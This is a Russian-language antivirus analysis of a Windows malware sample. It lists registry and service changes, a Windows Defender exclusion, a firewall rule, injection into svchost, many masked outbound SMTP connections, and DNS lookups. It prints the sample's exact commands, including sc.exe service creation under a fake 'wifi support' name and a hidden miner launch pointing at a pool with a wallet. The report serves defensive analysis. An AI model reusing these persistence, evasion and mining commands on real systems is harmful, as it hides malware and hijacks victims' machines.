Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\fpbtajbu] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fpbtajbu] 'ImagePath' = '%WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe /d"<Полный путь к файлу>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\fpbtajbu] 'ImagePath' = '%WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe'
Создает следующие сервисы
- 'fpbtajbu' %WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe /d"<Полный путь к файлу>"
- 'fpbtajbu' %WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\fpbtajbu' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rlwylfnm.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Перемещает следующие файлы
- %TEMP%\rlwylfnm.exe в %WINDIR%\syswow64\fpbtajbu\rlwylfnm.exe
Самоудаляется.
Сетевая активность
Подключается к
- 'mi##########m.mail.protection.outlook.com':25
- 'ma###.mds.de':25
- 'mx##.#mig.gmx.net':25
- 'ma##.###stalgraphics.com':25
- 'mx#######702.gslb.pphosted.com':25
- 'mx#######d01.gslb.pphosted.com':25
- 'ra######ake1.caregroup.org':25
- 'ff######x-vip2.prodigy.net':25
- 'ma##.###lied-info-mgmt.com':25
- 'mx#######c02.gslb.pphosted.com':25
- 'mx.###solmail.net':25
- 'ma##.#-email.net':25
- 'mx#######201.gslb.pphosted.com':25
- 'ho#########.olc.protection.outlook.com':25
- 'eu#.###.#rotection.outlook.com':25
- 'fa###ool.xyz':10060
- 'mx####.super-host.pl':25
- 'mx#.#ukthi.net':25
- 'ma##.#elkomsa.net':25
- 'cl###wire.net':25
- 'ma##.acr.net.au':25
- 'mx##.###us-vadesecure.net':25
- 'mx#######101.gslb.pphosted.com':25
- 'mx#######b01.gslb.pphosted.com':25
- 'mx#.##bexchange.nu':25
- 'd1######.#ss.barracudanetworks.com':25
- 'al######x-vip2.prodigy.net':25
- 'tn####.telefonica.net':25
- 'mg##.#wacollege.org':25
- 'mx.#####.#om.cust.b.hostedemail.com':25
- 'mx###ain.qq.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx#.#ate.com':25
- 'mx#######202.gslb.pphosted.com':25
- 'mx######b2d01.pphosted.com':25
- 'ma###.ncsecu.org':25
- 'mx###.##il.am0.yahoodns.net':25
- 'mx#######901.gslb.pphosted.com':25
- 'mx.######x.orange-business.com':25
- 'mx#.##il.ovh.net':25
- 'mx#######a01.gslb.pphosted.com':25
- 'mx##.#bs.open.ch':25
- 'al######x-vip1.prodigy.net':25
- 'mx######25001.pphosted.com':25
- 'ma##.##edit-suisse.com':25
- 'ma#############onsllc-com.mail.protection.outlook.com':25
- 'mx###.expurgate.net':25
- 'em##.bosbank.pl':25
- '17#.#13.115.155':430
- 'mx#######003.gslb.pphosted.com':25
- 'mx#######301.gslb.pphosted.com':25
- 'ri##########.mail.protection.outlook.com':25
- 'ma###esia.com':25
- 'ma##.#djhemail.com':25
- 'google.com':80
- '17#.#13.115.157':430
- '17#.#13.115.156':430
- 'ma##.#evagency.com':25
- 'ma##.vastag.com':25
- '17#.#13.115.154':430
- '17#.#13.115.153':430
- 'mx#.###lchannels.net':25
- 'mx#######401.gslb.pphosted.com':25
- 'r-####5.korea.com':25
- 'mx#######601.gslb.pphosted.com':25
- 'mx.##.#tinternet.com':25
- '17#.#13.115.158':486
- 'sv####lfheim.top':443
- '80.#6.75.4':430
- 'mx#######b02.gslb.pphosted.com':25
- 'mx####.#egamailservers.eu':25
- 'mx#######f01.gslb.pphosted.com':25
- 'mx#######701.gslb.pphosted.com':25
- 'mx.###m.kgslb.com':25
- 'gmail-smtp-in.l.google.com':25
- 'aspmx.l.google.com':25
- 'mx#######801.gslb.pphosted.com':25
- 'sm###.#hompsonhine.com':25
- 'mx###.##tsol.xion.oxcs.net':25
- 'sp###.###ted.systemlifeline.com':25
- 'as###.daum.net':25
- 'mx#######602.gslb.pphosted.com':25
- 'mx#.#aver.com':25
- 'mx.###anposta.com':25
- 'mt##.##0.yahoodns.net':25
- 'ma#####.danskebank.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#######501.gslb.pphosted.com':25
- 'mx######91d01.pphosted.com':25
- 'ex######.hardingpost.com':25
- 'mx#######e01.gslb.pphosted.com':25
- 'mx.###rmotwin.com':25
- 'ma##.##eenseainc.com':25
- '19######0.pamx1.hotmail.com':25
TCP
Запросы HTTP GET
- http://www.google.com/
Другие
- 'sv####lfheim.top':443
- 'mx#.#ukthi.net':25
- 'fa###ool.xyz':10060
- 'eu#.###.#rotection.outlook.com':25
- 'ho#########.olc.protection.outlook.com':25
- 'ma##.acr.net.au':25
- 'mx.###solmail.net':25
- 'ma##.###lied-info-mgmt.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx#######702.gslb.pphosted.com':25
- 'ma##.###stalgraphics.com':25
- 'cl###wire.net':25
- 'mx.###anposta.com':25
- 'ma##.#-email.net':25
- 'al######x-vip1.prodigy.net':25
- 'mx##.#bs.open.ch':25
- 'mx.######x.orange-business.com':25
- 'mx###.##il.am0.yahoodns.net':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx#.##il.ovh.net':25
- 'mx###ain.qq.com':25
- 'tn####.telefonica.net':25
- 'al######x-vip2.prodigy.net':25
- 'mg##.#wacollege.org':25
- 'd1######.#ss.barracudanetworks.com':25
- 'mx###.expurgate.net':25
- 'ma#############onsllc-com.mail.protection.outlook.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx.###m.kgslb.com':25
- 'gmail-smtp-in.l.google.com':25
- 'mx.##.#tinternet.com':25
- '80.#6.75.4':430
- '17#.#13.115.156':430
- 'r-####5.korea.com':25
- '17#.#13.115.155':430
- '17#.#13.115.157':430
- '17#.#13.115.153':430
- '17#.#13.115.154':430
- 'mx#.###lchannels.net':25
- 'ma###esia.com':25
- 'ri##########.mail.protection.outlook.com':25
- 'mx#.##bexchange.nu':25
- 'mx#######101.gslb.pphosted.com':25
- 'ma##.vastag.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'ex######.hardingpost.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'ma#####.danskebank.com':25
- 'mt##.##0.yahoodns.net':25
- 'mx#.#aver.com':25
- 'as###.daum.net':25
- 'ma##.##eenseainc.com':25
- 'sp###.###ted.systemlifeline.com':25
- 'sm###.#hompsonhine.com':25
- 'aspmx.l.google.com':25
- '17#.#13.115.158':486
- 'mx####.#egamailservers.eu':25
- '19######0.pamx1.hotmail.com':25
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK mx##.#mig.gmx.net
- DNS ASK bu####anzeiger.de
- DNS ASK ma###.mds.de
- DNS ASK ke####ily.org.uk
- DNS ASK li#e.se
- DNS ASK ca##ill.com
- DNS ASK mx#######202.gslb.pphosted.com
- DNS ASK ho##ial.com
- DNS ASK ma##.#-email.net
- DNS ASK ha####lemmerz.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK cs##.com
- DNS ASK ma##.##edit-suisse.com
- DNS ASK am##m.com
- DNS ASK sv##.org
- DNS ASK ne###reen.com
- DNS ASK st####yworks.com
- DNS ASK se####utilities.com
- DNS ASK ve##zon.net
- DNS ASK rw##.net
- DNS ASK sb###obal.net
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK pa###webber.com
- DNS ASK gm#.de
- DNS ASK mx##.#bs.open.ch
- DNS ASK mx#######702.gslb.pphosted.com
- DNS ASK ma##.###stalgraphics.com
- DNS ASK ga####parkisd.com
- DNS ASK ho##ail.com
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK tn#.com.au
- DNS ASK mx#######201.gslb.pphosted.com
- DNS ASK ac#.net.au
- DNS ASK ma##.acr.net.au
- DNS ASK ae##n.nl
- DNS ASK gr#####developments.com
- DNS ASK mx.###solmail.net
- DNS ASK ax####surance.co.uk
- DNS ASK mx#######c02.gslb.pphosted.com
- DNS ASK wn##.net
- DNS ASK ma##.###lied-info-mgmt.com
- DNS ASK am###tech.net
- DNS ASK ff######x-vip2.prodigy.net
- DNS ASK as###waii.com
- DNS ASK ca#####up.harvard.edu
- DNS ASK ra######ake1.caregroup.org
- DNS ASK co###ogic.com
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK cr######ommunications.com
- DNS ASK cr####lgraphics.com
- DNS ASK do####general.com
- DNS ASK ex####iveboard.com
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK bb##l.com
- DNS ASK te###onica.net
- DNS ASK tn####.telefonica.net
- DNS ASK be###outh.net
- DNS ASK al######x-vip2.prodigy.net
- DNS ASK ea###link.net
- DNS ASK cm##cgm.com
- DNS ASK tw#####iesacademy.org
- DNS ASK d1######.#ss.barracudanetworks.com
- DNS ASK so##e.com
- DNS ASK mx#.##bexchange.nu
- DNS ASK ei##om.net
- DNS ASK pm##ail.com
- DNS ASK tg#.org
- DNS ASK re###tsuite.com
- DNS ASK re###ency.com
- DNS ASK ma##.#evagency.com
- DNS ASK di###vest.com
- DNS ASK db##il.com
- DNS ASK 19######0.pamx1.hotmail.com
- DNS ASK an###try.com
- DNS ASK in###tek.com
- DNS ASK mi##.org
- DNS ASK hw###llege.org
- DNS ASK mg##.#wacollege.org
- DNS ASK mi###pring.com
- DNS ASK mx.#####.#om.cust.b.hostedemail.com
- DNS ASK ly##s.com
- DNS ASK am##a.com
- DNS ASK cl#####uisanderas.com
- DNS ASK mx#.##il.ovh.net
- DNS ASK di##.oleane.com
- DNS ASK mx.######x.orange-business.com
- DNS ASK gr###lar.com
- DNS ASK mx#######901.gslb.pphosted.com
- DNS ASK nc##cu.org
- DNS ASK ma###.ncsecu.org
- DNS ASK sk#.com
- DNS ASK ba####health.edu
- DNS ASK us.#bm.com
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK co#.##io-state.edu
- DNS ASK ho###il.co.uk
- DNS ASK na####lsciences.org
- DNS ASK mx######25001.pphosted.com
- DNS ASK ta##et.com
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK ro##rs.com
- DNS ASK mx#######.mail.am0.yahoodns.net
- DNS ASK ec##co.com
- DNS ASK mx###ain.qq.com
- DNS ASK cs.com
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK su#.com
- DNS ASK te###msa.net
- DNS ASK re###akina.com
- DNS ASK mx.###anposta.com
- DNS ASK va##ag.com
- DNS ASK ma##.vastag.com
- DNS ASK br###and.net
- DNS ASK mx####.#egamailservers.eu
- DNS ASK ex###ran.com
- DNS ASK mx#######701.gslb.pphosted.com
- DNS ASK pg.com
- DNS ASK mx#######602.gslb.pphosted.com
- DNS ASK fo##y.com
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK th###otwin.com
- DNS ASK mx.###rmotwin.com
- DNS ASK fa####dollar.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK ct##st.com
- DNS ASK ha###ngpost.com
- DNS ASK ex######.hardingpost.com
- DNS ASK be###outh.com
- DNS ASK mx######91d01.pphosted.com
- DNS ASK am###trade.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK mx#######003.gslb.pphosted.com
- DNS ASK be####lantic.net
- DNS ASK we###fargo.com
- DNS ASK ma####sanmiguel.com
- DNS ASK sv####lfheim.top
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK sw###l.sw.org
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK ar##c.com
- DNS ASK mx#######401.gslb.pphosted.com
- DNS ASK bt###ernet.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK ko##a.com
- DNS ASK r-####5.korea.com
- DNS ASK sc##r.com
- DNS ASK mx#.###lchannels.net
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK kd###mail.com
- DNS ASK ma##.#djhemail.com
- DNS ASK google.com
- DNS ASK ma###esia.com
- DNS ASK ri###usa.com
- DNS ASK ri##########.mail.protection.outlook.com
- DNS ASK mx#######301.gslb.pphosted.com
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK da####bank.co.uk
- DNS ASK ma#####.danskebank.com
- DNS ASK cf##c.org
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK ho###shoe.com
- DNS ASK ie##.org
- DNS ASK mx###.expurgate.net
- DNS ASK ma######gsolutionsllc.com
- DNS ASK ma#############onsllc-com.mail.protection.outlook.com
- DNS ASK ri#####deplumbingtn.com
- DNS ASK na##.com
- DNS ASK mx#.#ate.com
- DNS ASK an##em.com
- DNS ASK cl###wire.net
- DNS ASK ma##.#elkomsa.net
- DNS ASK me###nic.com
- DNS ASK mx#.#ukthi.net
- DNS ASK ol##ed.net
- DNS ASK mx####.super-host.pl
- DNS ASK fa###ool.xyz
- DNS ASK ho##ail.fr
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK tr####merica.com
- DNS ASK ot##.com
- DNS ASK fr###ier.com
- DNS ASK ar###tafx.com
- DNS ASK em##.bosbank.pl
- DNS ASK bo##ank.pl
- DNS ASK mx.###m.kgslb.com
- DNS ASK ya##o.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ea###link.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK gr###seainc.com
- DNS ASK ma##.##eenseainc.com
- DNS ASK pa##n.com
- DNS ASK as###.daum.net
- DNS ASK na##r.com
- DNS ASK mx#.#aver.com
- DNS ASK ma##h.com
- DNS ASK sp###.###ted.systemlifeline.com
- DNS ASK cf###ups.com
- DNS ASK mx###.##tsol.xion.oxcs.net
- DNS ASK th####onhine.com
- DNS ASK sm###.#hompsonhine.com
- DNS ASK st###.lowes.com
- DNS ASK mx#######801.gslb.pphosted.com
- DNS ASK cf#.org
- DNS ASK aspmx.l.google.com
- DNS ASK gm##l.com
- DNS ASK gmail-smtp-in.l.google.com
- DNS ASK ha##ail.net
- DNS ASK nr###ergy.com
- DNS ASK cf###obal.com
- DNS ASK ei####.#x.a.cloudfilter.net
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\fpbtajbu\rlwylfnm.exe' /d"<Полный путь к файлу>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\fpbtajbu\' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\rlwylfnm.exe" %WINDIR%\SysWOW64\fpbtajbu\' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' create fpbtajbu binPath= "%WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' description fpbtajbu "wifi internet conection"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' start fpbtajbu' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\fpbtajbu\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\rlwylfnm.exe" %WINDIR%\SysWOW64\fpbtajbu\
- '%WINDIR%\syswow64\sc.exe' create fpbtajbu binPath= "%WINDIR%\SysWOW64\fpbtajbu\rlwylfnm.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description fpbtajbu "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start fpbtajbu
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
